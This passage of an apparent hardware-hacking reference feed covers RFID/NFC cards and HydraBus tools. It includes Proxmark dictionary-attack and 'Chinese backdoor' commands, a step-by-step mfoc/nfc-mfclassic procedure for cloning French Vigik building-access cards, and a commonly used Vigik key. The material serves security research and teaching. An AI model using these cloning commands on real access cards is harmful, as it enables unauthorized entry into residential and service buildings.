&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;mf&lt;/span&gt; &lt;span class="n"&gt;chk&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt; &lt;span class="n"&gt;A&lt;/span&gt; &lt;span class="n"&gt;default_keys&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dic&lt;/span&gt; &lt;span class="c"&gt;# Dictionary attack with file: default_keys.dic&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="darkside-attack-prng-weak" class="anchored-heading"&gt;Darkside attack (PRNG Weak)&lt;a class="heading-anchor" href="#darkside-attack-prng-weak" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Proxmark method&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>HF - Mifare DESFire</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-desfire/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-desfire/</guid><description>&lt;h2 id="desfire-format" class="anchored-heading"&gt;DESFire® Format&lt;a class="heading-anchor" href="#desfire-format" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Mifare DESFire &lt;a href="https://arstechnica.com/information-technology/2011/10/researchers-hack-crypto-on-rfid-smart-cards-used-for-keyless-entry-and-transit-pass/"&gt;MF3ICD40&lt;/a&gt;: uses 3DES encryption, product discontinued.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mifare DESFire EV1&lt;/strong&gt; : Secure channel that can work with all the keys: DES, two-key 3DES, three-key 3DES and AES. Limited to 28 applications containing a maximum of 32 files per application.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mifare DESFire EV2&lt;/strong&gt; : The newest channel that can work with aes key only&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Mifare DESFire EV3&lt;/strong&gt; : Enhanced transaction speed and even better multi-application support.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each card has a master application with AID &lt;code&gt;0x000000&lt;/code&gt; that saves the card&amp;rsquo;s configuration.
The memory organization of DESFire supports up to 28 applications on the card and up to 32 files in each application.&lt;/p&gt;</description></item><item><title>HF - Mifare UltraLight</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-ultralight/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-mifare-ultralight/</guid><description>&lt;ul&gt;
&lt;li&gt;Ultralight C (3DES authentication)&lt;/li&gt;
&lt;li&gt;Ultralight EV1&lt;/li&gt;
&lt;li&gt;NTAG2&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="chinese-backdoor" class="anchored-heading"&gt;Chinese backdoor&lt;a class="heading-anchor" href="#chinese-backdoor" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pm3&lt;/span&gt; &lt;span class="p"&gt;--&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;14a&lt;/span&gt; &lt;span class="n"&gt;raw&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;-b&lt;/span&gt; &lt;span class="mf"&gt;7&lt;/span&gt; &lt;span class="mf"&gt;40&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pm3&lt;/span&gt; &lt;span class="p"&gt;--&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;14a&lt;/span&gt; &lt;span class="n"&gt;raw&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="mf"&gt;43&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pm3&lt;/span&gt; &lt;span class="p"&gt;--&amp;gt;&lt;/span&gt; &lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;14a&lt;/span&gt; &lt;span class="n"&gt;raw&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="n"&gt;a20059982120&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;0x40&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;init&lt;/span&gt; &lt;span class="n"&gt;backdoor&lt;/span&gt; &lt;span class="n"&gt;mode&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;0x41&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;wipe&lt;/span&gt; &lt;span class="n"&gt;fills&lt;/span&gt; &lt;span class="n"&gt;card&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;0xFF&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;0x42&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fills&lt;/span&gt; &lt;span class="n"&gt;card&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;0x00&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;0x43&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;no&lt;/span&gt; &lt;span class="n"&gt;authentication&lt;/span&gt; &lt;span class="n"&gt;needed&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt; &lt;span class="n"&gt;issue&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="n"&gt;0x3000&lt;/span&gt; &lt;span class="n"&gt;to&lt;/span&gt; &lt;span class="n"&gt;read&lt;/span&gt; &lt;span class="n"&gt;block&lt;/span&gt; &lt;span class="mf"&gt;0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;or&lt;/span&gt; &lt;span class="nb"&gt;write &lt;/span&gt;&lt;span class="n"&gt;block&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;0x44&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;fills&lt;/span&gt; &lt;span class="n"&gt;card&lt;/span&gt; &lt;span class="n"&gt;with&lt;/span&gt; &lt;span class="n"&gt;0x55&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="simulate" class="anchored-heading"&gt;Simulate&lt;a class="heading-anchor" href="#simulate" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;hf&lt;/span&gt; &lt;span class="n"&gt;14a&lt;/span&gt; &lt;span class="n"&gt;sim&lt;/span&gt; &lt;span class="mf"&gt;2&lt;/span&gt; &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="mf"&gt;7&lt;/span&gt;&lt;span class="n"&gt;-byte&lt;/span&gt; &lt;span class="n"&gt;tag&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.nxp.com/products/rfid-nfc/mifare-hf/mifare-ultralight:MC_53452"&gt;MIFARE® Ultralight® - NXP&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>HF - Vigik</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-vigik/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/rfid-nfc/hf-vigik/</guid><description>&lt;p&gt;Vigik is essentially a rebranded version of MIFARE Classic because it uses the same underlying technology and standards.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/cjbrigato/kigiv-for-proxmark3/releases"&gt;cjbrigato/kigiv-for-proxmark3&lt;/a&gt; - KIGIV stands for Reverse VIGIK, the French Residential and Postal/State services Residential Security system.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;modprobe&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="n"&gt;pn533_usb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;modprobe&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="n"&gt;pn533&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;nfc-list&lt;/span&gt; &lt;span class="c"&gt;# Check the proper functioning of the reader&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mfoc&lt;/span&gt; &lt;span class="n"&gt;-P&lt;/span&gt; &lt;span class="mf"&gt;500&lt;/span&gt; &lt;span class="n"&gt;-O&lt;/span&gt; &lt;span class="nb"&gt;blank-card&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dmp&lt;/span&gt; &lt;span class="c"&gt;# Extract the encryption keys from the Chinese RFID chip into a file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mfoc&lt;/span&gt; &lt;span class="n"&gt;-P&lt;/span&gt; &lt;span class="mf"&gt;500&lt;/span&gt; &lt;span class="n"&gt;-O&lt;/span&gt; &lt;span class="nb"&gt;original-card&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dmp&lt;/span&gt; &lt;span class="c"&gt;# Copy the content of the original RFID chip into a file&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;nfc-mfclassic&lt;/span&gt; &lt;span class="n"&gt;W&lt;/span&gt; &lt;span class="n"&gt;a&lt;/span&gt; &lt;span class="nb"&gt;original-card&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dmp&lt;/span&gt; &lt;span class="nb"&gt;blank-card&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;dmp&lt;/span&gt; &lt;span class="c"&gt;# Write the content of the original chip onto the Chinese chip&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="residential--service-tokens" class="anchored-heading"&gt;Residential &amp;amp; Service Tokens&lt;a class="heading-anchor" href="#residential--service-tokens" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Usually the key A is &lt;code&gt;0x314b49474956&lt;/code&gt; (&amp;ldquo;1KIGIV&amp;rdquo;)&lt;/p&gt;</description></item><item><title>HTTP - Hypertext Transfer Protocol</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/http/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/http/</guid><description>&lt;ul&gt;
&lt;li&gt;HTTPS Proxy: Burp Suite, MITM Proxy, Fiddler&lt;/li&gt;
&lt;li&gt;Network Sniffer: Wireshark, tcpdump&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>HydraBus</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/hydrabus/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/hydrabus/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/hydrabus-pin-assignment.jpg" alt="HydraBUS - Pin Assignment" width="1812" height="1282" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;HydraBUS - Pin Assignment&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="features" class="anchored-heading"&gt;Features&lt;a class="heading-anchor" href="#features" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Support many extensions&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/HardwareAllTheThings/gadgets/hydranfc/"&gt;HydraNFC&lt;/a&gt; - Hydrabus shield for NFC&lt;/li&gt;
&lt;li&gt;&lt;a href="https://swisskyrepo.github.io/HardwareAllTheThings/gadgets/hydraflash/"&gt;HydraFlash&lt;/a&gt; - NAND flash shield&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/smillier/HydraLINCAN"&gt;HydraLINCAN&lt;/a&gt; - Hydrabus shield for LIN and CAN buses&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;External interactions&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/Bus-interaction-commands"&gt;Bus interaction commands&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-Trigger-guide"&gt;Trigger mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-ADC-guide"&gt;ADC guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-DAC-guide"&gt;DAC guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-PWM-guide"&gt;PWM guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-GPIO-guide"&gt;GPIO guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-SPI-guide"&gt;SPI guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-Binary-SPI-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-I2C-guide"&gt;I2C guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-Binary-I2C-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-1-wire-guide"&gt;1-wire guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-1-Wire-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-2wire-guide"&gt;2-wire guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-3wire-guide"&gt;3-wire guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-UART-guide"&gt;UART guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-UART-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-CAN-guide"&gt;CAN guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-Binary-CAN-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-JTAG-guide"&gt;JTAG guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-NAND-Flash-guide"&gt;NAND Flash guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-NAND-Flash-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-Wiegand-guide"&gt;Wiegand guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-LIN-guide"&gt;LIN guide&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-SMARTCARD-guide"&gt;SMARTCARD guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-SMARTCARD-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-HydraNFC-v1-guide"&gt;NFC guide&lt;/a&gt; / &lt;a href="https://github.com/hydrabus/hydrafw/wiki/HydraFW-binary-NFC-Reader-mode-guide"&gt;binary mode&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="firmware" class="anchored-heading"&gt;Firmware&lt;a class="heading-anchor" href="#firmware" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw"&gt;hydrabus/hydrafw&lt;/a&gt; - HydraFW official firmware for HydraBus/HydraNFC&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw_hydranfc_shield_v2"&gt;hydrabus/hydrafw_hydranfc_shield_v2&lt;/a&gt; - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/bvernoux/blackmagic"&gt;bvernoux/blackmagic&lt;/a&gt; - In application debugger for ARM Cortex microcontrollers&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="firmware-update" class="anchored-heading"&gt;Firmware Update&lt;a class="heading-anchor" href="#firmware-update" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;p&gt;Detailed steps: &lt;a href="https://github.com/hydrabus/hydrafw/wiki/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux"&gt;hydrafw/Getting-Started-with-HydraBus-flash-and-use-hydrafw-on-linux&lt;/a&gt;&lt;/p&gt;</description></item><item><title>HydraFlash</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/hydraflash/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/hydraflash/</guid><description>&lt;blockquote&gt;
&lt;p&gt;Designed to dump Flash NAND chips&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="usage" class="anchored-heading"&gt;Usage&lt;a class="heading-anchor" href="#usage" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://github.com/hydrabus/DumpFlash-Hydrabus"&gt;hydrabus/DumpFlash-Hydrabus&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pip&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="n"&gt;git&lt;/span&gt;&lt;span class="p"&gt;+&lt;/span&gt;&lt;span class="n"&gt;https&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;github&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;com&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;hydrabus&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="nb"&gt;DumpFlash-Hydrabus&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;python2&lt;/span&gt; &lt;span class="n"&gt;DumpFlash&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;py&lt;/span&gt; &lt;span class="n"&gt;-d&lt;/span&gt; &lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;hydrabus&lt;/span&gt; &lt;span class="n"&gt;-i&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/HydraFlash"&gt;Hydrabus NAND Flash shield - hydrabus/HydraFlash&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>HydraNFC</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/hydranfc/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/hydranfc/</guid><description>&lt;h2 id="features" class="anchored-heading"&gt;Features&lt;a class="heading-anchor" href="#features" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;Support of microSD (FAT16/FAT32) card up to 32GB&lt;/li&gt;
&lt;li&gt;Virtual Serial Port access through micro USB with VT100 terminal/shell&lt;/li&gt;
&lt;li&gt;Basic UID read for Vicinity/ISO15693&lt;/li&gt;
&lt;li&gt;Basic UID read for ISO14443-A/MIFARE ® card 4 or 7bytes UID&lt;/li&gt;
&lt;li&gt;Read MIFARE Ultralight® tag content (full dump)&lt;/li&gt;
&lt;li&gt;Tag Emulation UID ISO14443A &amp;amp; MIFARE Classic® 1K&lt;/li&gt;
&lt;li&gt;Sniffer mode in an autonomous/stand-alone mode&lt;/li&gt;
&lt;li&gt;Real-time ISO14443A sniffer mode&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="firmware" class="anchored-heading"&gt;Firmware&lt;a class="heading-anchor" href="#firmware" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrabus/hydrafw_hydranfc_shield_v2"&gt;hydrabus/hydrafw_hydranfc_shield_v2&lt;/a&gt; - HydraFW dedicated to HydraBus v1 / HydraNFC Shield v2&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Using console, type &lt;code&gt;nfc&lt;/code&gt; + &lt;code&gt;Enter&lt;/code&gt; to enter NFC mode dedicated to HydraNFC Shield v2.&lt;/p&gt;</description></item><item><title>HydraUSB3</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/hydrausb3/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/hydrausb3/</guid><description>&lt;blockquote&gt;
&lt;p&gt;HydraUSB3 (WCH CH569) open source test firmware / examples / libraries to experiment with streaming / high-speed protocols (USB2 HS, USB3 SS, HSPI, SerDes&amp;hellip;)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://hydrabus.com/wp-content/uploads/2022/09/HydraUSB3_V1_PinAssignment.png" alt="HydraUSB3 - Pin Assignment" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;HydraUSB3 - Pin Assignment&lt;/figcaption&gt;&lt;/figure&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrausb3/hydrausb3_fw"&gt;hydrausb3/hydrausb3_fw&lt;/a&gt; - Firmware&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/hydrausb3/hydrausb3_hw"&gt;hydrausb3/hydrausb3_hw&lt;/a&gt; - Hardware documentation&lt;/li&gt;
&lt;/ul&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Warning&lt;/strong&gt;
It is MANDATORY to buy a “USB 3 Type A male to USB 3 Type A male cable” (the cable shall have Power+Data with USB2 and USB3 SS signals)&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="firmware-flashing" class="anchored-heading"&gt;Firmware Flashing&lt;a class="heading-anchor" href="#firmware-flashing" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Linux&lt;/strong&gt;:&lt;/p&gt;</description></item><item><title>I2C - Inter-Integrated Circuit</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/i2c/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/i2c/</guid><description>&lt;p&gt;I2C (Inter-Integrated Circuit), pronounced &amp;ldquo;I-squared-C&amp;rdquo; or &amp;ldquo;I-two-C&amp;rdquo;, is a popular communication protocol mainly used for low-speed, short-distance communication in embedded systems.&lt;/p&gt;
&lt;h2 id="analysis" class="anchored-heading"&gt;Analysis&lt;a class="heading-anchor" href="#analysis" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;:warning: Enable I2C on the Raspberry Pi via &lt;code&gt;raspi-config&lt;/code&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;i2c-tools&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="nb"&gt;apt-get&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;i2c-tools&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;i2cdetect&lt;/span&gt; &lt;span class="n"&gt;-y&lt;/span&gt; &lt;span class="mf"&gt;1&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;eeprog&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="nb"&gt;wget &lt;/span&gt;&lt;span class="n"&gt;http&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="p"&gt;//&lt;/span&gt;&lt;span class="n"&gt;darkswarm&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;org&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;eeprog&lt;/span&gt;&lt;span class="p"&gt;-&lt;/span&gt;&lt;span class="mf"&gt;0.7&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="mf"&gt;6&lt;/span&gt;&lt;span class="n"&gt;-tear5&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;tar&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;gz&lt;/span&gt;
